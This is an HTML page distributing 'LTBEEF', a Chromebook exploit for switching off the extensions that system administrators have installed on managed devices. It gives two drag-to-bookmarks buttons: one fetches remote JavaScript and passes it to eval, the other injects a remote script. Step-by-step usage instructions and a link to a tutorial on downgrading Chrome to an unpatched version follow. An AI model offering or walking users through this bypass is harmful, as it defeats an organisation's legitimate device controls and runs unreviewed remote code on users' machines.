<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<title>LTBEEF</title>
	<style>
		body {
			background-color: black;
			color: white;
			text-align: center;
			font-family: Arial, sans-serif;
		}

		h1, a {
			color: #00ff00;
		}

		p {
			margin: 0;
			padding: 0;
			text-align: center;
		}

		.btn {
			display: block;
			cursor: pointer;
			background: #4081BF;
			font-size: 18px;
			color: #fff;
			text-align: center;
			width: calc(17px) rem;
			padding: 10px;
			border-radius: 30px;
			font-weight: 400;
			line-height: 1.4rem;
			box-shadow: 0 2px 0 lightblue;
			text-decoration: none;
			width: 8rem;
			margin: 0 auto;
		}

		.btn:first-of-type {
			margin-bottom: 10px;
		}
	</style>
</head>
<body>
	<img src="https://user-images.githubusercontent.com/106267770/219900783-855ffa1c-5db1-41cd-9948-55076dad322a.png" alt="image">
	<h1>LTBEEF</h1>
	<p>LTBEEF (Literally The Best Exploit Ever Found) is an exploit found by <a href="https://www.bypassi.com">bypassi</a> (Bypassi#7037) and is a great way to disable spyware that was installed on your chromebook by your SysAdmins! The new UI was created by CompactCow#4717, Ingot was created by Nebelung#1335<br><i> Logo created by LittleMissNyan</i></p>
	<p><strong>Please note that this exploit has been patched in newer versions of Chrome, to downgrade go to<a href="https://frizys.github.io/fruvs/downgrading.html">the downgrade tutorial</a>!</strong></p>
	
	<div style="border: solid; padding: 5px;">
		<a class="btn" href="javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});"><strong>LTBEEF</strong></a>
		<a class="btn" href="javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())"><strong>Ingot</strong></a>
	</div>
	<p>- Drag either of the above buttons to your bookmarks bar</p>
	<ul>
		<li>Visit <a href="https://chrome.google.com/webstoreHIBDD">https://chrome.google.com/webstorex</a>. (This is a 404 page, and that is ok. If it is blocked, <a href="https://discord.gg/9w8pf35AUC">join the TN Discord server for support</a>!)</li>
		<li>Click the bookmark (<strong>NOTE: This only works on the Chrome Web Store.</strong>)</li>
		<li>Switch off the extensions you don't want to have anymore. You're done! The
<p><a href="./">Back to Main</a></p>
